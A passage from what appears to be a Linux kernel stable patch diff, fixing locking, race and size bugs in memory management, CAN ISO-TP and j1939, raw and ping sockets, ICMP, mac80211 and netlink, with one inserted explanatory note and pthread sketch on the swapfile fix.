+ 	int count = 0;
+ 	int error = -ENOMEM;
+ 	MA_STATE(mas_detach, &mt_detach, 0, 0);
+-	mt_init_flags(&mt_detach, MT_FLAGS_LOCK_EXTERN);
++	mt_init_flags(&mt_detach, mas->tree->ma_flags & MT_FLAGS_LOCK_MASK);
+ 	mt_set_external_lock(&mt_detach, &mm->mmap_lock);
+ 
+ 	if (mas_preallocate(mas, vma, GFP_KERNEL))
+@@ -3095,6 +3095,7 @@ void exit_mmap(struct mm_struct *mm)
+ 	 */
+ 	set_bit(MMF_OOM_SKIP, &mm->flags);
+ 	mmap_write_lock(mm);
++	mt_clear_in_rcu(&mm->mm_mt);
+ 	free_pgtables(&tlb, &mm->mm_mt, vma, FIRST_USER_ADDRESS,
+ 		      USER_PGTABLES_CEILING);
+ 	tlb_finish_mmu(&tlb);
+diff --git a/mm/swapfile.c b/mm/swapfile.c
+index eb9b0bf1fcddb..36899c4253019 100644
+--- a/mm/swapfile.c
++++ b/mm/swapfile.c
+@@ -679,6 +679,7 @@ static void __del_from_avail_list(struct swap_info_struct *p)
+ {
+ 	int nid;
+ 
++	assert_spin_locked(&p->lock);
+ 	for_each_node(nid)
+ 		plist_del(&p->avail_lists[nid], &swap_avail_heads[nid]);
+ }
+@@ -2435,8 +2436,8 @@ SYSCALL_DEFINE1(swapoff, const char __user *, specialfile)
+ 		spin_unlock(&swap_lock);
+ 		goto out_dput;
+ 	}
+-	del_from_avail_list(p);
+ 	spin_lock(&p->lock);
++	del_from_avail_list(p);
+ 	if (p->prio < 0) {
+ 		struct swap_info_struct *si = p;
+ 		int nid;
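[Note on the swapfile hunks above: they make the avail-list removal run under p->lock, and assert as much, so swapoff can no longer race with allocators that inspect the list while holding that lock. The shape of the fix is simply widening the critical section; a pthread sketch with a flag playing the role of assert_spin_locked():

#include <assert.h>
#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>

static pthread_mutex_t p_lock = PTHREAD_MUTEX_INITIALIZER;
static bool on_avail_list = true;
static bool lock_held;		/* poor man's assert_spin_locked() */

static void del_from_avail_list(void)
{
	assert(lock_held);	/* the new assert in the hunk above */
	on_avail_list = false;
}

static void swapoff_path(void)
{
	pthread_mutex_lock(&p_lock);
	lock_held = true;
	del_from_avail_list();	/* moved inside the critical section */
	/* ... rest of the teardown that previously raced ... */
	lock_held = false;
	pthread_mutex_unlock(&p_lock);
}

int main(void)
{
	swapoff_path();
	printf("on avail list: %d\n", (int)on_avail_list);
	return 0;
}
]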
+diff --git a/mm/vmalloc.c b/mm/vmalloc.c
+index ca71de7c9d775..b2249d01b3a2c 100644
+--- a/mm/vmalloc.c
++++ b/mm/vmalloc.c
+@@ -3070,9 +3070,11 @@ static void *__vmalloc_area_node(struct vm_struct *area, gfp_t gfp_mask,
+ 	 * allocation request, free them via __vfree() if any.
+ 	 */
+ 	if (area->nr_pages != nr_small_pages) {
+-		warn_alloc(gfp_mask, NULL,
+-			"vmalloc error: size %lu, page order %u, failed to allocate pages",
+-			area->nr_pages * PAGE_SIZE, page_order);
++		/* vm_area_alloc_pages() can also fail due to a fatal signal */
++		if (!fatal_signal_pending(current))
++			warn_alloc(gfp_mask, NULL,
++				"vmalloc error: size %lu, page order %u, failed to allocate pages",
++				area->nr_pages * PAGE_SIZE, page_order);
+ 		goto fail;
+ 	}
+ 
+diff --git a/net/can/isotp.c b/net/can/isotp.c
+index 9bc344851704e..5761d4ab839dd 100644
+--- a/net/can/isotp.c
++++ b/net/can/isotp.c
+@@ -119,7 +119,8 @@ enum {
+ 	ISOTP_WAIT_FIRST_FC,
+ 	ISOTP_WAIT_FC,
+ 	ISOTP_WAIT_DATA,
+-	ISOTP_SENDING
++	ISOTP_SENDING,
++	ISOTP_SHUTDOWN,
+ };
+ 
+ struct tpcon {
+@@ -880,8 +881,8 @@ static enum hrtimer_restart isotp_tx_timer_handler(struct hrtimer *hrtimer)
+ 					     txtimer);
+ 	struct sock *sk = &so->sk;
+ 
+-	/* don't handle timeouts in IDLE state */
+-	if (so->tx.state == ISOTP_IDLE)
++	/* don't handle timeouts in IDLE or SHUTDOWN state */
++	if (so->tx.state == ISOTP_IDLE || so->tx.state == ISOTP_SHUTDOWN)
+ 		return HRTIMER_NORESTART;
+ 
+ 	/* we did not get any flow control or echo frame in time */
+@@ -918,7 +919,6 @@ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ {
+ 	struct sock *sk = sock->sk;
+ 	struct isotp_sock *so = isotp_sk(sk);
+-	u32 old_state = so->tx.state;
+ 	struct sk_buff *skb;
+ 	struct net_device *dev;
+ 	struct canfd_frame *cf;
+@@ -928,23 +928,24 @@ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ 	int off;
+ 	int err;
+ 
+-	if (!so->bound)
++	if (!so->bound || so->tx.state == ISOTP_SHUTDOWN)
+ 		return -EADDRNOTAVAIL;
+ 
++wait_free_buffer:
+ 	/* we do not support multiple buffers - for now */
+-	if (cmpxchg(&so->tx.state, ISOTP_IDLE, ISOTP_SENDING) != ISOTP_IDLE ||
+-	    wq_has_sleeper(&so->wait)) {
+-		if (msg->msg_flags & MSG_DONTWAIT) {
+-			err = -EAGAIN;
+-			goto err_out;
+-		}
++	if (wq_has_sleeper(&so->wait) && (msg->msg_flags & MSG_DONTWAIT))
++		return -EAGAIN;
+ 
+-		/* wait for complete transmission of current pdu */
+-		err = wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
+-		if (err)
+-			goto err_out;
++	/* wait for complete transmission of current pdu */
++	err = wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
++	if (err)
++		goto err_event_drop;
+ 
+-		so->tx.state = ISOTP_SENDING;
++	if (cmpxchg(&so->tx.state, ISOTP_IDLE, ISOTP_SENDING) != ISOTP_IDLE) {
++		if (so->tx.state == ISOTP_SHUTDOWN)
++			return -EADDRNOTAVAIL;
++
++		goto wait_free_buffer;
+ 	}
+ 
+ 	if (!size || size > MAX_MSG_LENGTH) {
+@@ -1074,7 +1075,9 @@ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ 
+ 	if (wait_tx_done) {
+ 		/* wait for complete transmission of current pdu */
+-		wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
++		err = wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
++		if (err)
++			goto err_event_drop;
+ 
+ 		if (sk->sk_err)
+ 			return -sk->sk_err;
+@@ -1082,13 +1085,15 @@ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ 
+ 	return size;
+ 
++err_event_drop:
++	/* got signal: force tx state machine to be idle */
++	so->tx.state = ISOTP_IDLE;
++	hrtimer_cancel(&so->txfrtimer);
++	hrtimer_cancel(&so->txtimer);
+ err_out_drop:
+ 	/* drop this PDU and unlock a potential wait queue */
+-	old_state = ISOTP_IDLE;
+-err_out:
+-	so->tx.state = old_state;
+-	if (so->tx.state == ISOTP_IDLE)
+-		wake_up_interruptible(&so->wait);
++	so->tx.state = ISOTP_IDLE;
++	wake_up_interruptible(&so->wait);
+ 
+ 	return err;
+ }
+@@ -1120,7 +1125,7 @@ static int isotp_recvmsg(struct socket *sock, struct msghdr *msg, size_t size,
+ 	if (ret < 0)
+ 		goto out_err;
+ 
+-	sock_recv_timestamp(msg, sk, skb);
++	sock_recv_cmsgs(msg, sk, skb);
+ 
+ 	if (msg->msg_name) {
+ 		__sockaddr_check_size(ISOTP_MIN_NAMELEN);
+@@ -1150,10 +1155,12 @@ static int isotp_release(struct socket *sock)
+ 	net = sock_net(sk);
+ 
+ 	/* wait for complete transmission of current pdu */
+-	wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
++	while (wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE) == 0 &&
++	       cmpxchg(&so->tx.state, ISOTP_IDLE, ISOTP_SHUTDOWN) != ISOTP_IDLE)
++		;
+ 
+ 	/* force state machines to be idle also when a signal occurred */
+-	so->tx.state = ISOTP_IDLE;
++	so->tx.state = ISOTP_SHUTDOWN;
+ 	so->rx.state = ISOTP_IDLE;
+ 
+ 	spin_lock(&isotp_notifier_lock);
+@@ -1608,6 +1615,21 @@ static int isotp_init(struct sock *sk)
+ 	return 0;
+ }
+ 
++static __poll_t isotp_poll(struct file *file, struct socket *sock, poll_table *wait)
++{
++	struct sock *sk = sock->sk;
++	struct isotp_sock *so = isotp_sk(sk);
++
++	__poll_t mask = datagram_poll(file, sock, wait);
++	poll_wait(file, &so->wait, wait);
++
++	/* Check for false positives due to TX state */
++	if ((mask & EPOLLWRNORM) && (so->tx.state != ISOTP_IDLE))
++		mask &= ~(EPOLLOUT | EPOLLWRNORM);
++
++	return mask;
++}
++
+ static int isotp_sock_no_ioctlcmd(struct socket *sock, unsigned int cmd,
+ 				  unsigned long arg)
+ {
+@@ -1623,7 +1645,7 @@ static const struct proto_ops isotp_ops = {
+ 	.socketpair = sock_no_socketpair,
+ 	.accept = sock_no_accept,
+ 	.getname = isotp_getname,
+-	.poll = datagram_poll,
++	.poll = isotp_poll,
+ 	.ioctl = isotp_sock_no_ioctlcmd,
+ 	.gettstamp = sock_gettstamp,
+ 	.listen = sock_no_listen,
+diff --git a/net/can/j1939/transport.c b/net/can/j1939/transport.c
+index fb92c3609e172..fe3df23a25957 100644
+--- a/net/can/j1939/transport.c
++++ b/net/can/j1939/transport.c
+@@ -604,7 +604,10 @@ sk_buff *j1939_tp_tx_dat_new(struct j1939_priv *priv,
+ 	/* reserve CAN header */
+ 	skb_reserve(skb, offsetof(struct can_frame, data));
+ 
+-	memcpy(skb->cb, re_skcb, sizeof(skb->cb));
++	/* skb->cb must be large enough to hold a j1939_sk_buff_cb structure */
++	BUILD_BUG_ON(sizeof(skb->cb) < sizeof(*re_skcb));
++
++	memcpy(skb->cb, re_skcb, sizeof(*re_skcb));
+ 	skcb = j1939_skb_to_cb(skb);
+ 	if (swap_src_dst)
+ 		j1939_skbcb_swap(skcb);
+diff --git a/net/core/netpoll.c b/net/core/netpoll.c
+index 9be762e1d0428..4ac8d0ad9f6fc 100644
+--- a/net/core/netpoll.c
++++ b/net/core/netpoll.c
+@@ -137,6 +137,20 @@ static void queue_process(struct work_struct *work)
+ 	}
+ }
+ 
++static int netif_local_xmit_active(struct net_device *dev)
++{
++	int i;
++
++	for (i = 0; i < dev->num_tx_queues; i++) {
++		struct netdev_queue *txq = netdev_get_tx_queue(dev, i);
++
++		if (READ_ONCE(txq->xmit_lock_owner) == smp_processor_id())
++			return 1;
++	}
++
++	return 0;
++}
++
+ static void poll_one_napi(struct napi_struct *napi)
+ {
+ 	int work;
+@@ -183,7 +197,10 @@ void netpoll_poll_dev(struct net_device *dev)
+ 	if (!ni || down_trylock(&ni->dev_lock))
+ 		return;
+ 
+-	if (!netif_running(dev)) {
++	/* Some drivers will take the same locks in poll and xmit,
++	 * we can't poll if local CPU is already in xmit.
++	 */
++	if (!netif_running(dev) || netif_local_xmit_active(dev)) {
+ 		up(&ni->dev_lock);
+ 		return;
+ 	}
+diff --git a/net/ethtool/linkmodes.c b/net/ethtool/linkmodes.c
+index 126e06c713a3a..2d91f2a8c7626 100644
+--- a/net/ethtool/linkmodes.c
++++ b/net/ethtool/linkmodes.c
+@@ -282,11 +282,12 @@ static int ethnl_update_linkmodes(struct genl_info *info, struct nlattr **tb,
+ 					    "lanes configuration not supported by device");
+ 			return -EOPNOTSUPP;
+ 		}
+-	} else if (!lsettings->autoneg) {
+-		/* If autoneg is off and lanes parameter is not passed from user,
+-		 * set the lanes parameter to 0.
++	} else if (!lsettings->autoneg && ksettings->lanes) {
++		/* If autoneg is off and lanes parameter is not passed from user but
++		 * it was defined previously then set the lanes parameter to 0.
+ 		 */
+ 		ksettings->lanes = 0;
++		*mod = true;
+ 	}
+ 
+ 	ret = ethnl_update_bitset(ksettings->link_modes.advertising,
+diff --git a/net/ipv4/icmp.c b/net/ipv4/icmp.c
+index 46aa2d65e40ab..635ed4f057495 100644
+--- a/net/ipv4/icmp.c
++++ b/net/ipv4/icmp.c
+@@ -746,6 +746,11 @@ void __icmp_send(struct sk_buff *skb_in, int type, int code, __be32 info,
+ 		room = 576;
+ 	room -= sizeof(struct iphdr) + icmp_param.replyopts.opt.opt.optlen;
+ 	room -= sizeof(struct icmphdr);
++	/* Guard against tiny mtu. We need to include at least one
++	 * IP network header for this message to make any sense.
++	 */
++	if (room <= (int)sizeof(struct iphdr))
++		goto ende;
+ 
+ 	icmp_param.data_len = skb_in->len - icmp_param.offset;
+ 	if (icmp_param.data_len > room)
+diff --git a/net/ipv4/ping.c b/net/ipv4/ping.c
+index 409ec2a1f95b0..5178a3f3cb537 100644
+--- a/net/ipv4/ping.c
++++ b/net/ipv4/ping.c
+@@ -1089,13 +1089,13 @@ static struct sock *ping_get_idx(struct seq_file *seq, loff_t pos)
+ }
+ 
+ void *ping_seq_start(struct seq_file *seq, loff_t *pos, sa_family_t family)
+-	__acquires(RCU)
++	__acquires(ping_table.lock)
+ {
+ 	struct ping_iter_state *state = seq->private;
+ 	state->bucket = 0;
+ 	state->family = family;
+ 
+-	rcu_read_lock();
++	spin_lock(&ping_table.lock);
+ 
+ 	return *pos ? ping_get_idx(seq, *pos-1) : SEQ_START_TOKEN;
+ }
+@@ -1121,9 +1121,9 @@ void *ping_seq_next(struct seq_file *seq, void *v, loff_t *pos)
+ EXPORT_SYMBOL_GPL(ping_seq_next);
+ 
+ void ping_seq_stop(struct seq_file *seq, void *v)
+-	__releases(RCU)
++	__releases(ping_table.lock)
+ {
+-	rcu_read_unlock();
++	spin_unlock(&ping_table.lock);
+ }
+ EXPORT_SYMBOL_GPL(ping_seq_stop);
+ 
+diff --git a/net/ipv4/raw.c b/net/ipv4/raw.c
+index 006c1f0ed8b47..af03aa8a8e513 100644
+--- a/net/ipv4/raw.c
++++ b/net/ipv4/raw.c
+@@ -91,12 +91,12 @@ EXPORT_SYMBOL_GPL(raw_v4_hashinfo);
+ int raw_hash_sk(struct sock *sk)
+ {
+ 	struct raw_hashinfo *h = sk->sk_prot->h.raw_hash;
+-	struct hlist_nulls_head *hlist;
++	struct hlist_head *hlist;
+ 
+-	hlist = &h->ht[inet_sk(sk)->inet_num & (RAW_HTABLE_SIZE - 1)];
++	hlist = &h->ht[raw_hashfunc(sock_net(sk), inet_sk(sk)->inet_num)];
+ 
+ 	spin_lock(&h->lock);
+-	__sk_nulls_add_node_rcu(sk, hlist);
++	sk_add_node_rcu(sk, hlist);
+ 	sock_set_flag(sk, SOCK_RCU_FREE);
+ 	spin_unlock(&h->lock);
+ 	sock_prot_inuse_add(sock_net(sk), sk->sk_prot, 1);
+@@ -110,7 +110,7 @@ void raw_unhash_sk(struct sock *sk)
+ 	struct raw_hashinfo *h = sk->sk_prot->h.raw_hash;
+ 
+ 	spin_lock(&h->lock);
+-	if (__sk_nulls_del_node_init_rcu(sk))
++	if (sk_del_node_init_rcu(sk))
+ 		sock_prot_inuse_add(sock_net(sk), sk->sk_prot, -1);
+ 	spin_unlock(&h->lock);
+ }
+@@ -160,19 +160,18 @@ static int icmp_filter(const struct sock *sk, const struct sk_buff *skb)
+  * RFC 1122: SHOULD pass TOS value up to the transport layer.
+  * -> It does. And not only TOS, but all IP header.
+  */
+-static int raw_v4_input(struct sk_buff *skb, const struct iphdr *iph, int hash)
++static int raw_v4_input(struct net *net, struct sk_buff *skb,
++			const struct iphdr *iph, int hash)
+ {
+-	struct net *net = dev_net(skb->dev);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
+ 	int sdif = inet_sdif(skb);
++	struct hlist_head *hlist;
+ 	int dif = inet_iif(skb);
+ 	int delivered = 0;
+ 	struct sock *sk;
+ 
+ 	hlist = &raw_v4_hashinfo.ht[hash];
+ 	rcu_read_lock();
+-	sk_nulls_for_each(sk, hnode, hlist) {
++	sk_for_each_rcu(sk, hlist) {
+ 		if (!raw_v4_match(net, sk, iph->protocol,
+ 				  iph->saddr, iph->daddr, dif, sdif))
+ 			continue;
+@@ -193,9 +192,10 @@ static int raw_v4_input(struct sk_buff *skb, const struct iphdr *iph, int hash)
+ 
+ int raw_local_deliver(struct sk_buff *skb, int protocol)
+ {
+-	int hash = protocol & (RAW_HTABLE_SIZE - 1);
++	struct net *net = dev_net(skb->dev);
+ 
+-	return raw_v4_input(skb, ip_hdr(skb), hash);
++	return raw_v4_input(net, skb, ip_hdr(skb),
++			    raw_hashfunc(net, protocol));
+ }
+ 
+ static void raw_err(struct sock *sk, struct sk_buff *skb, u32 info)
+@@ -263,19 +263,18 @@ static void raw_err(struct sock *sk, struct sk_buff *skb, u32 info)
+ void raw_icmp_error(struct sk_buff *skb, int protocol, u32 info)
+ {
+ 	struct net *net = dev_net(skb->dev);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
+ 	int dif = skb->dev->ifindex;
+ 	int sdif = inet_sdif(skb);
++	struct hlist_head *hlist;
+ 	const struct iphdr *iph;
+ 	struct sock *sk;
+ 	int hash;
+ 
+-	hash = protocol & (RAW_HTABLE_SIZE - 1);
++	hash = raw_hashfunc(net, protocol);
+ 	hlist = &raw_v4_hashinfo.ht[hash];
+ 
+ 	rcu_read_lock();
+-	sk_nulls_for_each(sk, hnode, hlist) {
++	sk_for_each_rcu(sk, hlist) {
+ 		iph = (const struct iphdr *)skb->data;
+ 		if (!raw_v4_match(net, sk, iph->protocol,
+ 				  iph->daddr, iph->saddr, dif, sdif))
+@@ -947,14 +946,13 @@ static struct sock *raw_get_first(struct seq_file *seq, int bucket)
+ {
+ 	struct raw_hashinfo *h = pde_data(file_inode(seq->file));
+ 	struct raw_iter_state *state = raw_seq_private(seq);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
++	struct hlist_head *hlist;
+ 	struct sock *sk;
+ 
+ 	for (state->bucket = bucket; state->bucket < RAW_HTABLE_SIZE;
+ 			++state->bucket) {
+ 		hlist = &h->ht[state->bucket];
+-		sk_nulls_for_each(sk, hnode, hlist) {
++		sk_for_each(sk, hlist) {
+ 			if (sock_net(sk) == seq_file_net(seq))
+ 				return sk;
+ 		}
+@@ -967,7 +965,7 @@ static struct sock *raw_get_next(struct seq_file *seq, struct sock *sk)
+ 	struct raw_iter_state *state = raw_seq_private(seq);
+ 
+ 	do {
+-		sk = sk_nulls_next(sk);
++		sk = sk_next(sk);
+ 	} while (sk && sock_net(sk) != seq_file_net(seq));
+ 
+ 	if (!sk)
+@@ -986,9 +984,12 @@ static struct sock *raw_get_idx(struct seq_file *seq, loff_t pos)
+ }
+ 
+ void *raw_seq_start(struct seq_file *seq, loff_t *pos)
+-	__acquires(RCU)
++	__acquires(&h->lock)
+ {
+-	rcu_read_lock();
++	struct raw_hashinfo *h = pde_data(file_inode(seq->file));
++
++	spin_lock(&h->lock);
++
+ 	return *pos ? raw_get_idx(seq, *pos - 1) : SEQ_START_TOKEN;
+ }
+ EXPORT_SYMBOL_GPL(raw_seq_start);
+@@ -1007,9 +1008,11 @@ void *raw_seq_next(struct seq_file *seq, void *v, loff_t *pos)
+ EXPORT_SYMBOL_GPL(raw_seq_next);
+ 
+ void raw_seq_stop(struct seq_file *seq, void *v)
+-	__releases(RCU)
++	__releases(&h->lock)
+ {
+-	rcu_read_unlock();
++	struct raw_hashinfo *h = pde_data(file_inode(seq->file));
++
++	spin_unlock(&h->lock);
+ }
+ EXPORT_SYMBOL_GPL(raw_seq_stop);
+ 
+diff --git a/net/ipv4/raw_diag.c b/net/ipv4/raw_diag.c
+index 999321834b94a..da3591a66a169 100644
+--- a/net/ipv4/raw_diag.c
++++ b/net/ipv4/raw_diag.c
+@@ -57,8 +57,7 @@ static bool raw_lookup(struct net *net, struct sock *sk,
+ static struct sock *raw_sock_get(struct net *net, const struct inet_diag_req_v2 *r)
+ {
+ 	struct raw_hashinfo *hashinfo = raw_get_hashinfo(r);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
++	struct hlist_head *hlist;
+ 	struct sock *sk;
+ 	int slot;
+ 
+@@ -68,7 +67,7 @@ static struct sock *raw_sock_get(struct net *net, const struct inet_diag_req_v2
+ 	rcu_read_lock();
+ 	for (slot = 0; slot < RAW_HTABLE_SIZE; slot++) {
+ 		hlist = &hashinfo->ht[slot];
+-		sk_nulls_for_each(sk, hnode, hlist) {
++		sk_for_each_rcu(sk, hlist) {
+ 			if (raw_lookup(net, sk, r)) {
+ 				/*
+ 				 * Grab it and keep until we fill
+@@ -142,9 +141,8 @@ static void raw_diag_dump(struct sk_buff *skb, struct netlink_callback *cb,
+ 	struct raw_hashinfo *hashinfo = raw_get_hashinfo(r);
+ 	struct net *net = sock_net(skb->sk);
+ 	struct inet_diag_dump_data *cb_data;
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
+ 	int num, s_num, slot, s_slot;
++	struct hlist_head *hlist;
+ 	struct sock *sk = NULL;
+ 	struct nlattr *bc;
+ 
+@@ -161,7 +159,7 @@ static void raw_diag_dump(struct sk_buff *skb, struct netlink_callback *cb,
+ 		num = 0;
+ 
+ 		hlist = &hashinfo->ht[slot];
+-		sk_nulls_for_each(sk, hnode, hlist) {
++		sk_for_each_rcu(sk, hlist) {
+ 			struct inet_sock *inet = inet_sk(sk);
+ 
+ 			if (!net_eq(sock_net(sk), net))
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index c314fdde0097c..95a55c6630add 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -1965,8 +1965,13 @@ struct sk_buff *__ip6_make_skb(struct sock *sk,
+ 	IP6_UPD_PO_STATS(net, rt->rt6i_idev, IPSTATS_MIB_OUT, skb->len);
+ 	if (proto == IPPROTO_ICMPV6) {
+ 		struct inet6_dev *idev = ip6_dst_idev(skb_dst(skb));
++		u8 icmp6_type;
+ 
+-		ICMP6MSGOUT_INC_STATS(net, idev, icmp6_hdr(skb)->icmp6_type);
++		if (sk->sk_socket->type == SOCK_RAW && !inet_sk(sk)->hdrincl)
++			icmp6_type = fl6->fl6_icmp_type;
++		else
++			icmp6_type = icmp6_hdr(skb)->icmp6_type;
++		ICMP6MSGOUT_INC_STATS(net, idev, icmp6_type);
+ 		ICMP6_INC_STATS(net, idev, ICMP6_MIB_OUTMSGS);
+ 	}
+ 
+diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
+index ada087b50541a..4fc511bdf176c 100644
+--- a/net/ipv6/raw.c
++++ b/net/ipv6/raw.c
+@@ -141,10 +141,9 @@ EXPORT_SYMBOL(rawv6_mh_filter_unregister);
+ static bool ipv6_raw_deliver(struct sk_buff *skb, int nexthdr)
+ {
+ 	struct net *net = dev_net(skb->dev);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
+ 	const struct in6_addr *saddr;
+ 	const struct in6_addr *daddr;
++	struct hlist_head *hlist;
+ 	struct sock *sk;
+ 	bool delivered = false;
+ 	__u8 hash;
+@@ -152,10 +151,10 @@ static bool ipv6_raw_deliver(struct sk_buff *skb, int nexthdr)
+ 	saddr = &ipv6_hdr(skb)->saddr;
+ 	daddr = saddr + 1;
+ 
+-	hash = nexthdr & (RAW_HTABLE_SIZE - 1);
++	hash = raw_hashfunc(net, nexthdr);
+ 	hlist = &raw_v6_hashinfo.ht[hash];
+ 	rcu_read_lock();
+-	sk_nulls_for_each(sk, hnode, hlist) {
++	sk_for_each_rcu(sk, hlist) {
+ 		int filtered;
+ 
+ 		if (!raw_v6_match(net, sk, nexthdr, daddr, saddr,
+@@ -333,15 +332,14 @@ void raw6_icmp_error(struct sk_buff *skb, int nexthdr,
+ 		u8 type, u8 code, int inner_offset, __be32 info)
+ {
+ 	struct net *net = dev_net(skb->dev);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
++	struct hlist_head *hlist;
+ 	struct sock *sk;
+ 	int hash;
+ 
+-	hash = nexthdr & (RAW_HTABLE_SIZE - 1);
++	hash = raw_hashfunc(net, nexthdr);
+ 	hlist = &raw_v6_hashinfo.ht[hash];
+ 	rcu_read_lock();
+-	sk_nulls_for_each(sk, hnode, hlist) {
++	sk_for_each_rcu(sk, hlist) {
+ 		/* Note: ipv6_hdr(skb) != skb->data */
+ 		const struct ipv6hdr *ip6h = (const struct ipv6hdr *)skb->data;
+ 
+diff --git a/net/l2tp/l2tp_ip.c b/net/l2tp/l2tp_ip.c
+index 4db5a554bdbd9..41a74fc84ca13 100644
+--- a/net/l2tp/l2tp_ip.c
++++ b/net/l2tp/l2tp_ip.c
+@@ -677,8 +677,8 @@ MODULE_AUTHOR("James Chapman <jchapman@katalix.com>");
+ MODULE_DESCRIPTION("L2TP over IP");
+ MODULE_VERSION("1.0");
+ 
+-/* Use the value of SOCK_DGRAM (2) directory, because __stringify doesn't like
+- * enums
++/* Use the values of SOCK_DGRAM (2) as type and IPPROTO_L2TP (115) as protocol,
++ * because __stringify doesn't like enums
+  */
+-MODULE_ALIAS_NET_PF_PROTO_TYPE(PF_INET, 2, IPPROTO_L2TP);
+-MODULE_ALIAS_NET_PF_PROTO(PF_INET, IPPROTO_L2TP);
++MODULE_ALIAS_NET_PF_PROTO_TYPE(PF_INET, 115, 2);
++MODULE_ALIAS_NET_PF_PROTO(PF_INET, 115);
+diff --git a/net/l2tp/l2tp_ip6.c b/net/l2tp/l2tp_ip6.c
+index 2478aa60145fb..5137ea1861ce2 100644
+--- a/net/l2tp/l2tp_ip6.c
++++ b/net/l2tp/l2tp_ip6.c
+@@ -806,8 +806,8 @@ MODULE_AUTHOR("Chris Elston <celston@katalix.com>");
+ MODULE_DESCRIPTION("L2TP IP encapsulation for IPv6");
+ MODULE_VERSION("1.0");
+ 
+-/* Use the value of SOCK_DGRAM (2) directory, because __stringify doesn't like
+- * enums
++/* Use the values of SOCK_DGRAM (2) as type and IPPROTO_L2TP (115) as protocol,
++ * because __stringify doesn't like enums
+  */
+-MODULE_ALIAS_NET_PF_PROTO_TYPE(PF_INET6, 2, IPPROTO_L2TP);
+-MODULE_ALIAS_NET_PF_PROTO(PF_INET6, IPPROTO_L2TP);
++MODULE_ALIAS_NET_PF_PROTO_TYPE(PF_INET6, 115, 2);
++MODULE_ALIAS_NET_PF_PROTO(PF_INET6, 115);
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index 34cb833db25f5..39731ef51e03a 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -1261,7 +1261,8 @@ static int __must_check __sta_info_destroy_part1(struct sta_info *sta)
+ 	list_del_rcu(&sta->list);
+ 	sta->removed = true;
+ 
+-	drv_sta_pre_rcu_remove(local, sta->sdata, sta);
++	if (sta->uploaded)
++		drv_sta_pre_rcu_remove(local, sta->sdata, sta);
+ 
+ 	if (sdata->vif.type == NL80211_IFTYPE_AP_VLAN &&
+ 	    rcu_access_pointer(sdata->u.vlan.sta) == sta)
+diff --git a/net/mac80211/util.c b/net/mac80211/util.c
+index 9c219e525eded..ed9e659f49f63 100644
+--- a/net/mac80211/util.c
++++ b/net/mac80211/util.c
+@@ -4906,7 +4906,7 @@ u8 ieee80211_ie_len_eht_cap(struct ieee80211_sub_if_data *sdata, u8 iftype)
+ 				       &eht_cap->eht_cap_elem,
+ 				       is_ap);
+ 	return 2 + 1 +
+-	       sizeof(he_cap->he_cap_elem) + n +
++	       sizeof(eht_cap->eht_cap_elem) + n +
+ 	       ieee80211_eht_ppe_size(eht_cap->eht_ppe_thres[0],
+ 				      eht_cap->eht_cap_elem.phy_cap_info);
+ 	return 0;
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index c642776597531..f365dfdd672d7 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -1952,7 +1952,7 @@ static int netlink_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 	struct scm_cookie scm;
+ 	struct sock *sk = sock->sk;
+ 	struct netlink_sock *nlk = nlk_sk(sk);
+-	size_t copied;
++	size_t copied, max_recvmsg_len;
+ 	struct sk_buff *skb, *data_skb;
+ 	int err, ret;
+ 
+@@ -1985,9 +1985,10 @@ static int netlink_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ #endif
+ 
+ 	/* Record the max length of recvmsg() calls for future allocations */
+-	nlk->max_recvmsg_len = max(nlk->max_recvmsg_len, len);
+-	nlk->max_recvmsg_len = min_t(size_t, nlk->max_recvmsg_len,
+-				     SKB_WITH_OVERHEAD(32768));
++	max_recvmsg_len = max(READ_ONCE(nlk->max_recvmsg_len), len);
++	max_recvmsg_len = min_t(size_t, max_recvmsg_len,
++				SKB_WITH_OVERHEAD(32768));
++	WRITE_ONCE(nlk->max_recvmsg_len, max_recvmsg_len);
+ 
+ 	copied = data_skb->len;
+ 	if (len < copied) {
+@@ -2236,6 +2237,7 @@ static int netlink_dump(struct sock *sk)
+ 	struct netlink_ext_ack extack = {};
+ 	struct netlink_callback *cb;
+ 	struct sk_buff *skb = NULL;
++	size_t max_recvmsg_len;
+ 	struct module *module;
+ 	int err = -ENOBUFS;
+ 	int alloc_min_size;
+@@ -2258,8 +2260,9 @@ static int netlink_dump(struct sock *sk)
+ 	cb = &nlk->cb;
+ 	alloc_min_size = max_t(int, cb->min_dump_alloc, NLMSG_GOODSIZE);
+ 
+-	if (alloc_min_size < nlk->max_recvmsg_len) {
+-		alloc_size = nlk->max_recvmsg_len;
++	max_recvmsg_len = READ_ONCE(nlk->max_recvmsg_len);
++	if (alloc_min_size < max_recvmsg_len) {
++		alloc_size = max_recvmsg_len;
+ 		skb = alloc_skb(alloc_size,
